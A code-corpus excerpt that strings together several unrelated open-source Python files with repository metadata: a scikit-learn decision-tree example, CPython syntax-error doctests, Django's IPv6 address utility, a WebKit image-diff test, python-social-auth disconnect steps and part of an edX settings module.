environment variable C(ANSIBLE_NET_AUTH_PASS) will be used instead.
default: none
"""
| gpl-3.0 | 8,027,521,662,355,475,000 | 43.489796 | 88 | 0.674771 | false |
nikitasingh981/scikit-learn | examples/tree/plot_tree_regression_multioutput.py | 73 | 1854 | """
===================================================================
Multi-output Decision Tree Regression
===================================================================
An example to illustrate multi-output regression with decision tree.
The :ref:`decision trees <tree>`
is used to predict simultaneously the noisy x and y observations of a circle
given a single underlying feature. As a result, it learns local linear
regressions approximating the circle.
We can see that if the maximum depth of the tree (controlled by the
`max_depth` parameter) is set too high, the decision trees learn too fine
details of the training data and learn from the noise, i.e. they overfit.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn.tree import DecisionTreeRegressor
# Create a random dataset
rng = np.random.RandomState(1)
X = np.sort(200 * rng.rand(100, 1) - 100, axis=0)
y = np.array([np.pi * np.sin(X).ravel(), np.pi * np.cos(X).ravel()]).T
y[::5, :] += (0.5 - rng.rand(20, 2))
# Fit regression model
regr_1 = DecisionTreeRegressor(max_depth=2)
regr_2 = DecisionTreeRegressor(max_depth=5)
regr_3 = DecisionTreeRegressor(max_depth=8)
regr_1.fit(X, y)
regr_2.fit(X, y)
regr_3.fit(X, y)
# Predict
X_test = np.arange(-100.0, 100.0, 0.01)[:, np.newaxis]
y_1 = regr_1.predict(X_test)
y_2 = regr_2.predict(X_test)
y_3 = regr_3.predict(X_test)
# Plot the results
plt.figure()
s = 50
plt.scatter(y[:, 0], y[:, 1], c="navy", s=s, label="data")
plt.scatter(y_1[:, 0], y_1[:, 1], c="cornflowerblue", s=s, label="max_depth=2")
plt.scatter(y_2[:, 0], y_2[:, 1], c="c", s=s, label="max_depth=5")
plt.scatter(y_3[:, 0], y_3[:, 1], c="orange", s=s, label="max_depth=8")
plt.xlim([-6, 6])
plt.ylim([-6, 6])
plt.xlabel("target 1")
plt.ylabel("target 2")
plt.title("Multi-output Decision Tree Regression")
plt.legend()
plt.show()
| bsd-3-clause | -209,652,577,239,711,070 | 32.107143 | 79 | 0.638619 | false |
rubyinhell/brython | www/src/Lib/test/test_syntax.py | 87 | 18064 | """This module tests SyntaxErrors.
Here's an example of the sort of thing that is tested.
>>> def f(x):
... global x
Traceback (most recent call last):
SyntaxError: name 'x' is parameter and global
The tests are all raise SyntaxErrors. They were created by checking
each C call that raises SyntaxError. There are several modules that
raise these exceptions-- ast.c, compile.c, future.c, pythonrun.c, and
symtable.c.
The parser itself outlaws a lot of invalid syntax. None of these
errors are tested here at the moment. We should add some tests; since
there are infinitely many programs with invalid syntax, we would need
to be judicious in selecting some.
The compiler generates a synthetic module name for code executed by
doctest. Since all the code comes from the same module, a suffix like
[1] is appended to the module name, As a consequence, changing the
order of tests in this module means renumbering all the errors after
it. (Maybe we should enable the ellipsis option for these tests.)
In ast.c, syntax errors are raised by calling ast_error().
Errors from set_context():
>>> obj.None = 1
Traceback (most recent call last):
SyntaxError: invalid syntax
>>> None = 1
Traceback (most recent call last):
SyntaxError: assignment to keyword
It's a syntax error to assign to the empty tuple. Why isn't it an
error to assign to the empty list? It will always raise some error at
runtime.
>>> () = 1
Traceback (most recent call last):
SyntaxError: can't assign to ()
>>> f() = 1
Traceback (most recent call last):
SyntaxError: can't assign to function call
>>> del f()
Traceback (most recent call last):
SyntaxError: can't delete function call
>>> a + 1 = 2
Traceback (most recent call last):
SyntaxError: can't assign to operator
>>> (x for x in x) = 1
Traceback (most recent call last):
SyntaxError: can't assign to generator expression
>>> 1 = 1
Traceback (most recent call last):
SyntaxError: can't assign to literal
>>> "abc" = 1
Traceback (most recent call last):
SyntaxError: can't assign to literal
>>> b"" = 1
Traceback (most recent call last):
SyntaxError: can't assign to literal
>>> `1` = 1
Traceback (most recent call last):
SyntaxError: invalid syntax
If the left-hand side of an assignment is a list or tuple, an illegal
expression inside that contain should still cause a syntax error.
This test just checks a couple of cases rather than enumerating all of
them.
>>> (a, "b", c) = (1, 2, 3)
Traceback (most recent call last):
SyntaxError: can't assign to literal
>>> [a, b, c + 1] = [1, 2, 3]
Traceback (most recent call last):
SyntaxError: can't assign to operator
>>> a if 1 else b = 1
Traceback (most recent call last):
SyntaxError: can't assign to conditional expression
From compiler_complex_args():
>>> def f(None=1):
... pass
Traceback (most recent call last):
SyntaxError: invalid syntax
From ast_for_arguments():
>>> def f(x, y=1, z):
... pass
Traceback (most recent call last):
SyntaxError: non-default argument follows default argument
>>> def f(x, None):
... pass
Traceback (most recent call last):
SyntaxError: invalid syntax
>>> def f(*None):
... pass
Traceback (most recent call last):
SyntaxError: invalid syntax
>>> def f(**None):
... pass
Traceback (most recent call last):
SyntaxError: invalid syntax
From ast_for_funcdef():
>>> def None(x):
... pass
Traceback (most recent call last):
SyntaxError: invalid syntax
From ast_for_call():
>>> def f(it, *varargs):
... return list(it)
>>> L = range(10)
>>> f(x for x in L)
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> f(x for x in L, 1)
Traceback (most recent call last):
SyntaxError: Generator expression must be parenthesized if not sole argument
>>> f((x for x in L), 1)
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> f(i0, i1, i2, i3, i4, i5, i6, i7, i8, i9, i10, i11,
... i12, i13, i14, i15, i16, i17, i18, i19, i20, i21, i22,
... i23, i24, i25, i26, i27, i28, i29, i30, i31, i32, i33,
... i34, i35, i36, i37, i38, i39, i40, i41, i42, i43, i44,
... i45, i46, i47, i48, i49, i50, i51, i52, i53, i54, i55,
... i56, i57, i58, i59, i60, i61, i62, i63, i64, i65, i66,
... i67, i68, i69, i70, i71, i72, i73, i74, i75, i76, i77,
... i78, i79, i80, i81, i82, i83, i84, i85, i86, i87, i88,
... i89, i90, i91, i92, i93, i94, i95, i96, i97, i98, i99,
... i100, i101, i102, i103, i104, i105, i106, i107, i108,
... i109, i110, i111, i112, i113, i114, i115, i116, i117,
... i118, i119, i120, i121, i122, i123, i124, i125, i126,
... i127, i128, i129, i130, i131, i132, i133, i134, i135,
... i136, i137, i138, i139, i140, i141, i142, i143, i144,
... i145, i146, i147, i148, i149, i150, i151, i152, i153,
... i154, i155, i156, i157, i158, i159, i160, i161, i162,
... i163, i164, i165, i166, i167, i168, i169, i170, i171,
... i172, i173, i174, i175, i176, i177, i178, i179, i180,
... i181, i182, i183, i184, i185, i186, i187, i188, i189,
... i190, i191, i192, i193, i194, i195, i196, i197, i198,
... i199, i200, i201, i202, i203, i204, i205, i206, i207,
... i208, i209, i210, i211, i212, i213, i214, i215, i216,
... i217, i218, i219, i220, i221, i222, i223, i224, i225,
... i226, i227, i228, i229, i230, i231, i232, i233, i234,
... i235, i236, i237, i238, i239, i240, i241, i242, i243,
... i244, i245, i246, i247, i248, i249, i250, i251, i252,
... i253, i254, i255)
Traceback (most recent call last):
SyntaxError: more than 255 arguments
The actual error cases counts positional arguments, keyword arguments,
and generator expression arguments separately. This test combines the
three.
>>> f(i0, i1, i2, i3, i4, i5, i6, i7, i8, i9, i10, i11,
... i12, i13, i14, i15, i16, i17, i18, i19, i20, i21, i22,
... i23, i24, i25, i26, i27, i28, i29, i30, i31, i32, i33,
... i34, i35, i36, i37, i38, i39, i40, i41, i42, i43, i44,
... i45, i46, i47, i48, i49, i50, i51, i52, i53, i54, i55,
... i56, i57, i58, i59, i60, i61, i62, i63, i64, i65, i66,
... i67, i68, i69, i70, i71, i72, i73, i74, i75, i76, i77,
... i78, i79, i80, i81, i82, i83, i84, i85, i86, i87, i88,
... i89, i90, i91, i92, i93, i94, i95, i96, i97, i98, i99,
... i100, i101, i102, i103, i104, i105, i106, i107, i108,
... i109, i110, i111, i112, i113, i114, i115, i116, i117,
... i118, i119, i120, i121, i122, i123, i124, i125, i126,
... i127, i128, i129, i130, i131, i132, i133, i134, i135,
... i136, i137, i138, i139, i140, i141, i142, i143, i144,
... i145, i146, i147, i148, i149, i150, i151, i152, i153,
... i154, i155, i156, i157, i158, i159, i160, i161, i162,
... i163, i164, i165, i166, i167, i168, i169, i170, i171,
... i172, i173, i174, i175, i176, i177, i178, i179, i180,
... i181, i182, i183, i184, i185, i186, i187, i188, i189,
... i190, i191, i192, i193, i194, i195, i196, i197, i198,
... i199, i200, i201, i202, i203, i204, i205, i206, i207,
... i208, i209, i210, i211, i212, i213, i214, i215, i216,
... i217, i218, i219, i220, i221, i222, i223, i224, i225,
... i226, i227, i228, i229, i230, i231, i232, i233, i234,
... i235, i236, i237, i238, i239, i240, i241, i242, i243,
... (x for x in i244), i245, i246, i247, i248, i249, i250, i251,
... i252=1, i253=1, i254=1, i255=1)
Traceback (most recent call last):
SyntaxError: more than 255 arguments
>>> f(lambda x: x[0] = 3)
Traceback (most recent call last):
SyntaxError: lambda cannot contain assignment
The grammar accepts any test (basically, any expression) in the
keyword slot of a call site. Test a few different options.
>>> f(x()=2)
Traceback (most recent call last):
SyntaxError: keyword can't be an expression
>>> f(a or b=1)
Traceback (most recent call last):
SyntaxError: keyword can't be an expression
>>> f(x.y=1)
Traceback (most recent call last):
SyntaxError: keyword can't be an expression
More set_context():
>>> (x for x in x) += 1
Traceback (most recent call last):
SyntaxError: can't assign to generator expression
>>> None += 1
Traceback (most recent call last):
SyntaxError: assignment to keyword
>>> f() += 1
Traceback (most recent call last):
SyntaxError: can't assign to function call
Test continue in finally in weird combinations.
continue in for loop under finally should be ok.
>>> def test():
... try:
... pass
... finally:
... for abc in range(10):
... continue
... print(abc)
>>> test()
9
Start simple, a continue in a finally should not be allowed.
>>> def test():
... for abc in range(10):
... try:
... pass
... finally:
... continue
Traceback (most recent call last):
...
SyntaxError: 'continue' not supported inside 'finally' clause
This is essentially a continue in a finally which should not be allowed.
>>> def test():
... for abc in range(10):
... try:
... pass
... finally:
... try:
... continue
... except:
... pass
Traceback (most recent call last):
...
SyntaxError: 'continue' not supported inside 'finally' clause
>>> def foo():
... try:
... pass
... finally:
... continue
Traceback (most recent call last):
...
SyntaxError: 'continue' not supported inside 'finally' clause
>>> def foo():
... for a in ():
... try:
... pass
... finally:
... continue
Traceback (most recent call last):
...
SyntaxError: 'continue' not supported inside 'finally' clause
>>> def foo():
... for a in ():
... try:
... pass
... finally:
... try:
... continue
... finally:
... pass
Traceback (most recent call last):
...
SyntaxError: 'continue' not supported inside 'finally' clause
>>> def foo():
... for a in ():
... try: pass
... finally:
... try:
... pass
... except:
... continue
Traceback (most recent call last):
...
SyntaxError: 'continue' not supported inside 'finally' clause
There is one test for a break that is not in a loop. The compiler
uses a single data structure to keep track of try-finally and loops,
so we need to be sure that a break is actually inside a loop. If it
isn't, there should be a syntax error.
>>> try:
... print(1)
... break
... print(2)
... finally:
... print(3)
Traceback (most recent call last):
...
SyntaxError: 'break' outside loop
This should probably raise a better error than a SystemError (or none at all).
In 2.5 there was a missing exception and an assert was triggered in a debug
build. The number of blocks must be greater than CO_MAXBLOCKS. SF #1565514
>>> while 1:
... while 2:
... while 3:
... while 4:
... while 5:
... while 6:
... while 8:
... while 9:
... while 10:
... while 11:
... while 12:
... while 13:
... while 14:
... while 15:
... while 16:
... while 17:
... while 18:
... while 19:
... while 20:
... while 21:
... while 22:
... break
Traceback (most recent call last):
...
SystemError: too many statically nested blocks
Misuse of the nonlocal statement can lead to a few unique syntax errors.
>>> def f(x):
... nonlocal x
Traceback (most recent call last):
...
SyntaxError: name 'x' is parameter and nonlocal
>>> def f():
... global x
... nonlocal x
Traceback (most recent call last):
...
SyntaxError: name 'x' is nonlocal and global
>>> def f():
... nonlocal x
Traceback (most recent call last):
...
SyntaxError: no binding for nonlocal 'x' found
From SF bug #1705365
>>> nonlocal x
Traceback (most recent call last):
...
SyntaxError: nonlocal declaration not allowed at module level
TODO(jhylton): Figure out how to test SyntaxWarning with doctest.
## >>> def f(x):
## ... def f():
## ... print(x)
## ... nonlocal x
## Traceback (most recent call last):
## ...
## SyntaxWarning: name 'x' is assigned to before nonlocal declaration
## >>> def f():
## ... x = 1
## ... nonlocal x
## Traceback (most recent call last):
## ...
## SyntaxWarning: name 'x' is assigned to before nonlocal declaration
This tests assignment-context; there was a bug in Python 2.5 where compiling
a complex 'if' (one with 'elif') would fail to notice an invalid suite,
leading to spurious errors.
>>> if 1:
... x() = 1
... elif 1:
... pass
Traceback (most recent call last):
...
SyntaxError: can't assign to function call
>>> if 1:
... pass
... elif 1:
... x() = 1
Traceback (most recent call last):
...
SyntaxError: can't assign to function call
>>> if 1:
... x() = 1
... elif 1:
... pass
... else:
... pass
Traceback (most recent call last):
...
SyntaxError: can't assign to function call
>>> if 1:
... pass
... elif 1:
... x() = 1
... else:
... pass
Traceback (most recent call last):
...
SyntaxError: can't assign to function call
>>> if 1:
... pass
... elif 1:
... pass
... else:
... x() = 1
Traceback (most recent call last):
...
SyntaxError: can't assign to function call
Make sure that the old "raise X, Y[, Z]" form is gone:
>>> raise X, Y
Traceback (most recent call last):
...
SyntaxError: invalid syntax
>>> raise X, Y, Z
Traceback (most recent call last):
...
SyntaxError: invalid syntax
>>> f(a=23, a=234)
Traceback (most recent call last):
...
SyntaxError: keyword argument repeated
>>> del ()
Traceback (most recent call last):
SyntaxError: can't delete ()
>>> {1, 2, 3} = 42
Traceback (most recent call last):
SyntaxError: can't assign to literal
Corner-cases that used to fail to raise the correct error:
>>> def f(*, x=lambda __debug__:0): pass
Traceback (most recent call last):
SyntaxError: assignment to keyword
>>> def f(*args:(lambda __debug__:0)): pass
Traceback (most recent call last):
SyntaxError: assignment to keyword
>>> def f(**kwargs:(lambda __debug__:0)): pass
Traceback (most recent call last):
SyntaxError: assignment to keyword
>>> with (lambda *:0): pass
Traceback (most recent call last):
SyntaxError: named arguments must follow bare *
Corner-cases that used to crash:
>>> def f(**__debug__): pass
Traceback (most recent call last):
SyntaxError: assignment to keyword
>>> def f(*xx, __debug__): pass
Traceback (most recent call last):
SyntaxError: assignment to keyword
"""
import re
import unittest
import warnings
from test import support
class SyntaxTestCase(unittest.TestCase):
def _check_error(self, code, errtext,
filename="<testcase>", mode="exec", subclass=None):
"""Check that compiling code raises SyntaxError with errtext.
        errtext is a regular expression that must be present in the
        text of the exception raised.  If subclass is specified it
is the expected subclass of SyntaxError (e.g. IndentationError).
"""
try:
compile(code, filename, mode)
except SyntaxError as err:
if subclass and not isinstance(err, subclass):
self.fail("SyntaxError is not a %s" % subclass.__name__)
mo = re.search(errtext, str(err))
if mo is None:
self.fail("SyntaxError did not contain '%r'" % (errtext,))
else:
self.fail("compile() did not raise SyntaxError")
def test_assign_call(self):
self._check_error("f() = 1", "assign")
def test_assign_del(self):
self._check_error("del f()", "delete")
def test_global_err_then_warn(self):
# Bug tickler: The SyntaxError raised for one global statement
# shouldn't be clobbered by a SyntaxWarning issued for a later one.
source = """if 1:
def error(a):
global a # SyntaxError
def warning():
b = 1
global b # SyntaxWarning
"""
warnings.filterwarnings(action='ignore', category=SyntaxWarning)
self._check_error(source, "global")
warnings.filters.pop(0)
def test_break_outside_loop(self):
self._check_error("break", "outside loop")
def test_unexpected_indent(self):
self._check_error("foo()\n bar()\n", "unexpected indent",
subclass=IndentationError)
def test_no_indent(self):
self._check_error("if 1:\nfoo()", "expected an indented block",
subclass=IndentationError)
def test_bad_outdent(self):
self._check_error("if 1:\n foo()\n bar()",
"unindent does not match .* level",
subclass=IndentationError)
def test_kwargs_last(self):
self._check_error("int(base=10, '2')", "non-keyword arg")
def test_main():
support.run_unittest(SyntaxTestCase)
from test import test_syntax
support.run_doctest(test_syntax, verbosity=True)
if __name__ == "__main__":
test_main()
| bsd-3-clause | -3,719,575,714,766,748,700 | 29.462057 | 78 | 0.582761 | false |
abhattad4/Digi-Menu | build/lib.linux-x86_64-2.7/django/utils/ipv6.py | 225 | 7971 | # This code was mostly based on ipaddr-py
# Copyright 2007 Google Inc. http://code.google.com/p/ipaddr-py/
# Licensed under the Apache License, Version 2.0 (the "License").
from django.core.exceptions import ValidationError
from django.utils.six.moves import range
from django.utils.translation import ugettext_lazy as _
def clean_ipv6_address(ip_str, unpack_ipv4=False,
error_message=_("This is not a valid IPv6 address.")):
"""
Cleans an IPv6 address string.
Validity is checked by calling is_valid_ipv6_address() - if an
invalid address is passed, ValidationError is raised.
    Replaces the longest continuous zero-sequence with "::", removes
    leading zeroes, and makes sure all hextets are lowercase.
Args:
ip_str: A valid IPv6 address.
unpack_ipv4: if an IPv4-mapped address is found,
return the plain IPv4 address (default=False).
error_message: An error message used in the ValidationError.
Returns:
        A compressed IPv6 address; if unpack_ipv4 is set and the address
        is IPv4-mapped, the plain IPv4 address is returned instead.
"""
best_doublecolon_start = -1
best_doublecolon_len = 0
doublecolon_start = -1
doublecolon_len = 0
if not is_valid_ipv6_address(ip_str):
raise ValidationError(error_message, code='invalid')
# This algorithm can only handle fully exploded
# IP strings
ip_str = _explode_shorthand_ip_string(ip_str)
ip_str = _sanitize_ipv4_mapping(ip_str)
# If needed, unpack the IPv4 and return straight away
# - no need in running the rest of the algorithm
if unpack_ipv4:
ipv4_unpacked = _unpack_ipv4(ip_str)
if ipv4_unpacked:
return ipv4_unpacked
hextets = ip_str.split(":")
for index in range(len(hextets)):
# Remove leading zeroes
hextets[index] = hextets[index].lstrip('0')
if not hextets[index]:
hextets[index] = '0'
# Determine best hextet to compress
if hextets[index] == '0':
doublecolon_len += 1
if doublecolon_start == -1:
# Start of a sequence of zeros.
doublecolon_start = index
if doublecolon_len > best_doublecolon_len:
# This is the longest sequence of zeros so far.
best_doublecolon_len = doublecolon_len
best_doublecolon_start = doublecolon_start
else:
doublecolon_len = 0
doublecolon_start = -1
# Compress the most suitable hextet
if best_doublecolon_len > 1:
best_doublecolon_end = (best_doublecolon_start +
best_doublecolon_len)
# For zeros at the end of the address.
if best_doublecolon_end == len(hextets):
hextets += ['']
hextets[best_doublecolon_start:best_doublecolon_end] = ['']
# For zeros at the beginning of the address.
if best_doublecolon_start == 0:
hextets = [''] + hextets
result = ":".join(hextets)
return result.lower()
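# Illustrative usage (added for clarity, not part of the original module; the
# sample addresses are arbitrary):
#   clean_ipv6_address('2001:0db8:0000:0000:0000:0000:0000:0001')
#       -> '2001:db8::1'
#   clean_ipv6_address('::ffff:0a0a:0a0a', unpack_ipv4=True)
#       -> '10.10.10.10'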
def _sanitize_ipv4_mapping(ip_str):
"""
Sanitize IPv4 mapping in an expanded IPv6 address.
This converts ::ffff:0a0a:0a0a to ::ffff:10.10.10.10.
If there is nothing to sanitize, returns an unchanged
string.
Args:
ip_str: A string, the expanded IPv6 address.
Returns:
The sanitized output string, if applicable.
"""
if not ip_str.lower().startswith('0000:0000:0000:0000:0000:ffff:'):
# not an ipv4 mapping
return ip_str
hextets = ip_str.split(':')
if '.' in hextets[-1]:
# already sanitized
return ip_str
ipv4_address = "%d.%d.%d.%d" % (
int(hextets[6][0:2], 16),
int(hextets[6][2:4], 16),
int(hextets[7][0:2], 16),
int(hextets[7][2:4], 16),
)
result = ':'.join(hextets[0:6])
result += ':' + ipv4_address
return result
def _unpack_ipv4(ip_str):
"""
Unpack an IPv4 address that was mapped in a compressed IPv6 address.
This converts 0000:0000:0000:0000:0000:ffff:10.10.10.10 to 10.10.10.10.
If there is nothing to sanitize, returns None.
Args:
ip_str: A string, the expanded IPv6 address.
Returns:
The unpacked IPv4 address, or None if there was nothing to unpack.
"""
if not ip_str.lower().startswith('0000:0000:0000:0000:0000:ffff:'):
return None
return ip_str.rsplit(':', 1)[1]
def is_valid_ipv6_address(ip_str):
"""
Ensure we have a valid IPv6 address.
Args:
ip_str: A string, the IPv6 address.
Returns:
A boolean, True if this is a valid IPv6 address.
"""
from django.core.validators import validate_ipv4_address
# We need to have at least one ':'.
if ':' not in ip_str:
return False
# We can only have one '::' shortener.
if ip_str.count('::') > 1:
return False
# '::' should be encompassed by start, digits or end.
if ':::' in ip_str:
return False
# A single colon can neither start nor end an address.
if ((ip_str.startswith(':') and not ip_str.startswith('::')) or
(ip_str.endswith(':') and not ip_str.endswith('::'))):
return False
# We can never have more than 7 ':' (1::2:3:4:5:6:7:8 is invalid)
if ip_str.count(':') > 7:
return False
# If we have no concatenation, we need to have 8 fields with 7 ':'.
if '::' not in ip_str and ip_str.count(':') != 7:
# We might have an IPv4 mapped address.
if ip_str.count('.') != 3:
return False
ip_str = _explode_shorthand_ip_string(ip_str)
# Now that we have that all squared away, let's check that each of the
# hextets are between 0x0 and 0xFFFF.
for hextet in ip_str.split(':'):
if hextet.count('.') == 3:
# If we have an IPv4 mapped address, the IPv4 portion has to
# be at the end of the IPv6 portion.
if not ip_str.split(':')[-1] == hextet:
return False
try:
validate_ipv4_address(hextet)
except ValidationError:
return False
else:
try:
# a value error here means that we got a bad hextet,
# something like 0xzzzz
if int(hextet, 16) < 0x0 or int(hextet, 16) > 0xFFFF:
return False
except ValueError:
return False
return True
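# Quick illustrative checks (added for clarity; addresses are arbitrary):
#   is_valid_ipv6_address('fe80::1')            -> True
#   is_valid_ipv6_address('1:2:3:4:5:6:7:8:9')  -> False (more than 8 fields)
#   is_valid_ipv6_address('127.0.0.1')          -> False (no ':' present)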
def _explode_shorthand_ip_string(ip_str):
"""
Expand a shortened IPv6 address.
Args:
ip_str: A string, the IPv6 address.
Returns:
A string, the expanded IPv6 address.
"""
if not _is_shorthand_ip(ip_str):
# We've already got a longhand ip_str.
return ip_str
new_ip = []
hextet = ip_str.split('::')
# If there is a ::, we need to expand it with zeroes
# to get to 8 hextets - unless there is a dot in the last hextet,
# meaning we're doing v4-mapping
if '.' in ip_str.split(':')[-1]:
fill_to = 7
else:
fill_to = 8
if len(hextet) > 1:
sep = len(hextet[0].split(':')) + len(hextet[1].split(':'))
new_ip = hextet[0].split(':')
for __ in range(fill_to - sep):
new_ip.append('0000')
new_ip += hextet[1].split(':')
else:
new_ip = ip_str.split(':')
# Now need to make sure every hextet is 4 lower case characters.
# If a hextet is < 4 characters, we've got missing leading 0's.
ret_ip = []
for hextet in new_ip:
ret_ip.append(('0' * (4 - len(hextet)) + hextet).lower())
return ':'.join(ret_ip)
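# Example of the expansion performed above (added for clarity):
#   _explode_shorthand_ip_string('fe80::1')
#       -> 'fe80:0000:0000:0000:0000:0000:0000:0001'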
def _is_shorthand_ip(ip_str):
"""Determine if the address is shortened.
Args:
ip_str: A string, the IPv6 address.
Returns:
A boolean, True if the address is shortened.
"""
if ip_str.count('::') == 1:
return True
if any(len(x) < 4 for x in ip_str.split(':')):
return True
return False
| bsd-3-clause | 8,907,170,792,437,575,000 | 28.413284 | 75 | 0.585623 | false |
iradul/qtwebkit | Tools/Scripts/webkitpy/port/image_diff_unittest.py | 121 | 2509 | # Copyright (C) 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit testing base class for Port implementations."""
import unittest2 as unittest
from webkitpy.port.server_process_mock import MockServerProcess
from webkitpy.port.image_diff import ImageDiffer
class FakePort(object):
def __init__(self, server_process_output):
self._server_process_constructor = lambda port, nm, cmd, env: MockServerProcess(lines=server_process_output)
def _path_to_image_diff(self):
return ''
def setup_environ_for_server(self, nm):
return None
class TestImageDiffer(unittest.TestCase):
def test_diff_image_failed(self):
port = FakePort(['diff: 100% failed\n'])
image_differ = ImageDiffer(port)
self.assertEqual(image_differ.diff_image('foo', 'bar', 0.1), ('', 100.0, None))
def test_diff_image_passed(self):
port = FakePort(['diff: 0% passed\n'])
image_differ = ImageDiffer(port)
self.assertEqual(image_differ.diff_image('foo', 'bar', 0.1), (None, 0, None))
| gpl-2.0 | 1,433,616,131,712,398,300 | 43.017544 | 116 | 0.740933 | false |
openhatch/oh-mainline | vendor/packages/python-social-auth/social/pipeline/disconnect.py | 88 | 1082 | from social.exceptions import NotAllowedToDisconnect
def allowed_to_disconnect(strategy, user, name, user_storage,
association_id=None, *args, **kwargs):
if not user_storage.allowed_to_disconnect(user, name, association_id):
raise NotAllowedToDisconnect()
def get_entries(strategy, user, name, user_storage, association_id=None,
*args, **kwargs):
return {
'entries': user_storage.get_social_auth_for_user(
user, name, association_id
)
}
def revoke_tokens(strategy, entries, *args, **kwargs):
revoke_tokens = strategy.setting('REVOKE_TOKENS_ON_DISCONNECT', False)
if revoke_tokens:
for entry in entries:
if 'access_token' in entry.extra_data:
backend = entry.get_backend(strategy)(strategy)
backend.revoke_token(entry.extra_data['access_token'],
entry.uid)
def disconnect(strategy, entries, user_storage, *args, **kwargs):
for entry in entries:
user_storage.disconnect(entry)
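# Illustrative wiring (added; not part of the original file): these steps are
# normally listed in a disconnect pipeline setting, for example under Django
# something along the lines of:
#   SOCIAL_AUTH_DISCONNECT_PIPELINE = (
#       'social.pipeline.disconnect.allowed_to_disconnect',
#       'social.pipeline.disconnect.get_entries',
#       'social.pipeline.disconnect.revoke_tokens',
#       'social.pipeline.disconnect.disconnect',
#   )
# The exact setting name and entries depend on the framework integration used.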
| agpl-3.0 | 5,841,264,762,316,133,000 | 33.903226 | 74 | 0.624769 | false |
simone-campagna/zapper | lib/python/zapper/text.py | 1 | 1993 | #!/usr/bin/env python3
#
# Copyright 2013 Simone Campagna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__author__ = 'Simone Campagna'
import re
import textwrap
class Text(object):
__re_split__ = re.compile(r'\n\n')
def __init__(self, width=70):
self.width = width
def split_paragraphs(self, text):
for paragraph in self.__re_split__.split(text):
yield paragraph
def wrap(self, text):
lines = []
for paragraph in self.split_paragraphs(text):
lines.extend(self.wrap_paragraph(paragraph))
lines.append('')
if lines:
del lines[-1]
return lines
def wrap_paragraph(self, text):
return textwrap.wrap(textwrap.dedent(text), width=self.width)
def fill(self, text):
return '\n'.join(self.wrap(text))
def fill(text):
return Text().fill(text)
if __name__ == "__main__":
text = """\
This is a very long long long line, and it should be split into several lines, each of them not longer than 70 characters. This will be the first paragraph.
This line belongs to the same first paragraph.
This line belongs to the second paragraph, and not to the first one. Indeed two newlines are used to separate it from the first one.
This is the second paragraph too.
This is the last paragraph. It is a useless line, as the ones above, but it is a useful example.
This is the last line of the last paragraph."""
t = Text()
print(t.fill(text))
| apache-2.0 | 557,389,295,216,239,200 | 31.145161 | 157 | 0.677371 | false |
miptliot/edx-platform | cms/envs/yaml_config.py | 12 | 8323 | """
This is the default template for our main set of AWS servers.
Before importing this settings file the following MUST be
defined in the environment:
* SERVICE_VARIANT - can be either "lms" or "cms"
* CONFIG_ROOT - the directory where the application
yaml config files are located
"""
# We intentionally define lots of variables that aren't used, and
# want to import all variables from base settings files
# pylint: disable=wildcard-import, unused-wildcard-import, undefined-variable, used-before-assignment
import yaml
from .common import *
from openedx.core.lib.logsettings import get_logger_config
from util.config_parse import convert_tokens
import os
from path import Path as path
from xmodule.modulestore.modulestore_settings import convert_module_store_setting_if_needed
# https://stackoverflow.com/questions/2890146/how-to-force-pyyaml-to-load-strings-as-unicode-objects
from yaml import Loader, SafeLoader
def construct_yaml_str(self, node):
"""
Override the default string handling function
to always return unicode objects
"""
return self.construct_scalar(node)
Loader.add_constructor(u'tag:yaml.org,2002:str', construct_yaml_str)
SafeLoader.add_constructor(u'tag:yaml.org,2002:str', construct_yaml_str)
# SERVICE_VARIANT specifies name of the variant used, which decides what YAML
# configuration files are read during startup.
SERVICE_VARIANT = os.environ.get('SERVICE_VARIANT', None)
# CONFIG_ROOT specifies the directory where the YAML configuration
# files are expected to be found. If not specified, use the project
# directory.
CONFIG_ROOT = path(os.environ.get('CONFIG_ROOT', ENV_ROOT))
# CONFIG_PREFIX specifies the prefix of the YAML configuration files,
# based on the service variant. If no variant is use, don't use a
# prefix.
CONFIG_PREFIX = SERVICE_VARIANT + "." if SERVICE_VARIANT else ""
##############################################################
#
# DEFAULT SETTINGS FOR PRODUCTION
#
# These are defaults common for all production deployments
#
DEBUG = False
TEMPLATE_DEBUG = False
EMAIL_BACKEND = 'django_ses.SESBackend'
SESSION_ENGINE = 'django.contrib.sessions.backends.cache'
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
GIT_REPO_EXPORT_DIR = '/edx/var/edxapp/export_course_repos'
